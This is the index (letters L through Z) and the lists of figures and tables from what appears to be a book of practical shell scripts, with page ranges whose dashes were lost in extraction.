internal, 23032
listmacusers script, 300302
loan payments, calculating, 8486
loancalc script, 8486
locate script, 5861 , 120
locate system, 5859
locate.db file, 60
.locatedb file, 120
Location string, 181
locked files, 33
lockf command, 222
lockfile command, 31
lockfile program, 131, 222
log files, rotating, 15458 , 15557
logger command, 55
logging web events, 2058
logrm script, 5455
log-yahoo-search.cgi script, 2068
long lines
formatting, 4547
wrapping, 97
ls command, 52, 56, 61
lynx command, 17275 , 230, 233, 236

Index
M
Mac OS X scripts, 297314
adding email alias, 3079
adding users, 3027
fixing open command, 312
list NetInfo users, 300302
producing summary listings of iTunes libraries, 31012
set Terminal title dynamically, 30910
maintenance, system. See system maintenance
man command, 63
man page database, 6366
managing users, 11136
adding users to system, 12427
analyzing disk usage, 11314
cleaning up after guests leave, 13536
deleting user accounts, 12931
figuring out available disk space, 11718
implementing secure locate, 12024
improving readability of df output, 11820
reporting disk hogs, 11517
suspending user accounts, 12729
validating user environment, 13235
manpagepat command, 65
method=get form, 182, 194
mklocatedb script, 5861
mkslocate script, 12024
mkslocatedb script, 124
more program, 96
moviedata script, 18688
movies, 18688
Music Folder field value, 311
mv command, 158
mysftp script, 100101

Index
N
name, process, 28690
ncftp command, 247
NetInfo database, 124, 298, 300302
netperf script, 28186 , 28485
code, 28183
hacking, 286
how works, 28485
results of, 286
running, 28586
netstat program, 28084
netstat.log file, 284, 286
network status, monitoring, 28086
code, 28183
hacking script, 286
script, 28586
network time, 141
Network Time Protocol (NTP), 141
newdf script, 11820
newquota script, 100
newrm script, 4749
nicenumber script, 1820
nireport utility, 300301 , 304
niutil command, 3024 , 305
normalize function, 89
normdate script, 1518 , 25
nroff command, 45, 46
NTP (Network Time Protocol), 141
numberlines script, 9495
numbers
large, 1820
line, 9495

Index
O
okaywords file, 82
online, calculating time spent, 16668
open command, 298, 31214
Open Directory Project, 180
open2 script, 31214 , 31314
Oxford English Dictionary, 180

Index
P
PAGER variable, 10, 132
page-with-counter.html, 225
palindrome checker, 316
partial variable, 322
password-protected account, 17172
passwords, Apache, 23744
PATH variable, 1013 , 132, 134
pax command, 160
payments, loan, 8486
periodic script, 154
Perl module, 6566
permission denied error messages, 123
photo album, creating web-based, 21417
Point-to-Point Protocol (PPP) daemon, 167
portfolio script, 19395
POSIX compliant, 4, 10
PPP (Point-to-Point Protocol) daemon, 167
privacy.shtml file, 231
/proc directory, 114
process name, tasks by, 28690
processing contact forms, 21114
ps command, 144

Index
Q
QUERY_STRING variable, 206, 241
quiz, state capitals, 32427
quota script, 98100

Index
R
ragged.txt, 106
random text, displayed, 22627
randomquote script, 22627
read input command, 98
read statement, 17172
Really Simple Syndication (RSS), 200
realquota variable, 99
realrm process, 48
referrer code, 256
region/locationname columns, 69
reject.dat file, 230, 232
remember script, 72, 7273
reminder utility, 7273
remindme script, 72, 73
remote archives, 26871
remotebackup script, 26871
remotebackup-filelist, 26871
remotehost script, 100, 101
remove.log file, 55
renicename script, 28690
resource forks, 305
result code, 256
right-rooting, 146
rm command, 49, 54
root user, 138
rot13 mechanism, 31516
rotatelogs script, 15458
rotating log files, 15458
RSS (Really Simple Syndication), 200
run-script script, 154

Index
S
screencapture command, 299
scriptbc script, 2931
search engine traffic, 26064
searchinfo script, 26064
secure locate, implementing, 12024 , 174, 219, 258, 284
sed script, 79, 103
sed statement, 52
sed-based transform, 14
semaphore, 31
sendmail, 198, 202, 3078
server administration. See Internet server administration
server-side include (SSI) directive, 224
services, displaying enabled, 14144
set-date script, 13941
setgid script, 120, 138
setting system date, 13941
setuid command, 138, 139
setuid permission, 55
setuid script, 120
sftp program
to look like ftp program, 100101
synchronizing files, 24953
sftpsync script, 24953
shell scripts
debugging, 3841
library of, building, 3638
types of, 24
what they are, 2
showcgienv script, 2045
showfile command, 96
showfile script, 9596
showpic script, 217
.shp suffix, 79
shpell script, 7780
.shtml web page, 224, 227
SIGHUP signal, 128
SIGKILL signal, 128
Simple Network Management Protocol (SNMP), 124
slocate script, 120, 122, 123
.slocatedb files, 124
smallest command, 109
Snapz Pro X software, 299
SNMP (Simple Network Management Protocol), 124
Solaris system, 34
sourcing capability, 36
sourcing files, 191

spelldict script, 8082


spelling, checking, 7582
adding local dictionary, 8082
of individual words, 7576
Shpell, 7780
on web pages, 23537
ssh package, 249
SSI (server-side include) directive, 224
ssync script, 25153
state capitals quiz, 32427
states script, 32427
stderr command, 234
stdin command, 81
stdout command, 233
stock portfolio, tracking, 19395
Straight Dope, The, 210
streamfile script, 225
su -fm user, 122
substitution cipher, 315
sudo command, 114, 116, 141, 305
sudo password, 141
suspending user accounts, 12729
suspenduser script, 124, 12729
syslogd.conf file, 55
system administration. See managing users; system maintenance
system date, setting, 13941
system() function, 119
system maintenance, 13763
backing up directories, 16163
displaying enabled services, 14144
ensuring system cron jobs run, 15254
killing processes by name, 14447
managing backups, 15860
rotating log files, 15458
setting system date, 13941
tracking set user ID applications, 13839
validating user crontab entries. See crontab entries, validating

Index
T
tar archive, 274
tar invocation, 270, 271
target directory, 275
tasks, renicing, 28690
TCP protocol, 280
tcsh shell, 310
temperatures, converting, 8284
template directory, 13536
Terminal application, 309
terminal title, setting dynamically, 30910
test command, 2
testing scripts, 12
text, random, 226
text-based web page counter, 22125
TIFF files, 300
time

different time zones, 6669


spent online, 16668
timed(8) script, 141
timein script, 6669
.timestamp file, 246
timezonename columns, 69
titleterm script, 30910
toolong script, 9798
tracking
BBC news with lynx, 17275
changes on web pages, 196200
stock portfolio, 19395
weather, 18082
trap command, 79, 107
traverse function, 23031
traverse2.dat file, 231
traverse.dat file, 231
traverse.errors file, 23132
trimmailbox script, 271

Index
U
umask value, 48
Unimplemented command, 170
uniq command, 174
UNIX, tweaking, 93110
compressed files
ensuring maximally, 1079
working with, 1047
displaying files with, 9496
emulating GNU-style flags with quota, 98100
fixing grep, 1024
making sftp look like ftp, 100101
wrapping long lines, 9798
unpacker script, 27275
unrm script, 4953
Unscramble word game, 31619
updatecounter script, 22325
URLs, extracting from web pages, 17578
user accounts
deleting, 12931
listing all, 24142
suspending, 12729
user commands, 4370
archiving files as removed, 4749
displaying contents of directories, 5658
displaying time in different time zones, 6669
emulating DIR environment, 6163
formatting long lines, 4547
locating files by filename, 5861
logging file removals, 5455
man page database, 6366
working with removed file archive, 4953
user environment, 13235
users
See also system administration
adding to Mac OS X system, 3027
managing, 11136
adding users to system, 12427
analyzing disk usage, 11314
cleaning up after guests leave, 13536
deleting user accounts, 12931
figuring out available disk space, 11718
implementing secure locate, 12024
improving readability of df output, 11820
reporting disk hogs, 11517
suspending user accounts, 12729
validating user environment, 13235
NetInfo, 300302
tracking ID applications, 13839
validating crontab entries, 14752
code, 14850
hacking script, 152
how works, 151
results of script, 151
validating environment, 13235
web and Internet users, 165200
calculating currency values, 18892

calculating time spent online, 16668


checking overdue books at library, 18286
defining words online, 17880
downloading files via ftp, 16972
extracting URLs from web pages, 17578
movie info from IMDb, 18688
tracking BBC news with lynx, 17275
tracking changes on web pages, 196200
tracking stock portfolio, 19395
tracking weather, 18082
/users directory, 113
utilities, creating, 7192
adding local dictionary to spell, 8082
calculating loan payments, 8486
checking spelling of individual words, 7576
converting temperatures, 8284
interactive calculator, 7375
keeping track of events, 8691
reminder utility, 7273
Shpell interactive spell-checking facility, 7780
uuencode program, 270

Index
V
validalnum script, 1315
validating
See also crontab entries, validating
alphanumeric input, 1315
date formats, 2527
floating-point, 2224
integer input, 2022
user environment, 13235
validator script, 13235
valid-date script, 2527
validfloat script, 2224
validint script, 2022
/var/log directory, 157
/var/log/messages log, 272
verifycron script, 14752
view source capability, 183
virtual host accounts, 29095
code, 29093
hacking script, 295
VirtualHost block, 293

Index
W
wait call, 109
Warez files, 280
watch-and-nice script, 28990
wc command, 52, 57, 60, 98, 177
weather script, 18082
weather, tracking, 18082
web and Internet administration, 22954
See also Internet server administration
identifying broken internal links, 23032
managing Apache passwords, 23744
reporting broken external links, 23235
synchronizing directories with ftp, 24447
synchronizing files with sftp, 24953
synchronizing to remote directory via ftp, 24749
verifying spelling on web pages, 23537
web and Internet users, 165200
calculating currency values, 18892
calculating time spent online, 16668
checking overdue books at library, 18286
defining words online, 17880
downloading files via ftp, 16972
extracting URLs from web pages, 17578
movie info from IMDb, 18688
tracking BBC news with lynx, 17275
tracking changes on web pages, 196200
tracking stock portfolio, 19395
tracking weather, 18082
web events, logging, 2058
web pages
building, 20811
extracting URLs from, 17578
text-based counter, 22125
tracking changes on, 196200
turning into email messages, 210
verifying spelling, 23537
webaccess script, 25760
web-based photo album, creating, 216
weberrors script, 26468
webhome directory, 274
webmaster hacks, 20128
building guest book, 21721
building web pages, 20811
CGI environment, 2045
creating text-based web page counter, 22125
creating web-based photo album, 21417
displaying random text, 226
logging web events, 2058
processing contact forms, 21114
running scripts in chapter, 203
/web/mirror directory, 275
websites, mirroring, 27275
webspell script, 23537
whatis command, 63

which command, 224


whoami script, 59
word game, 31619
WordNet lexical database, 178
words, defining, 17880
wrappers, 44, 54
wrapping long lines, 9798

Index
X
xargs command, 57
xferlog format, 27680
xinetd service, 144
XML (Extensible Markup Language), 166

Index
Z
zcat script, 1047
zones, time, 6669

List of Figures
Chapter 7: Web and Internet Users
Figure 7-1: A graphically complex website in l y nx http//www.intuitive.com/
Figure 7-2: The site has changed, so the page is sent via email from c ha n ge tr a ck

Chapter 8: Webmaster Hacks


Figure 8-1: The CGI runtime environment, from a shell script
Figure 8-2: Yahoo! search results appear, but the search was logged!
Figure 8-3: The Kevin & Kell web page, built on the fly
Figure 8-4: A typical user feedback form, already filled in
Figure 8-5: An instant online photo album created with 44 lines of shell script!
Figure 8-6: A guest book system, all in one neat shell script
Figure 8-7: Server-side includes let us invoke shell scripts from within HTML files

Chapter 9: Web and Internet Administration


Figure 9-1: A shell-script-based Apache password management system

Chapter 11: Mac OS X Scripts


Figure 11-1: Login window with Gareth's account included

List of Tables
Chapter 10: Internet Server Administration
Table 10-1: Field values in the ac cess_ l og file
Table 10-2: Field values in the xf erlog file

You might also like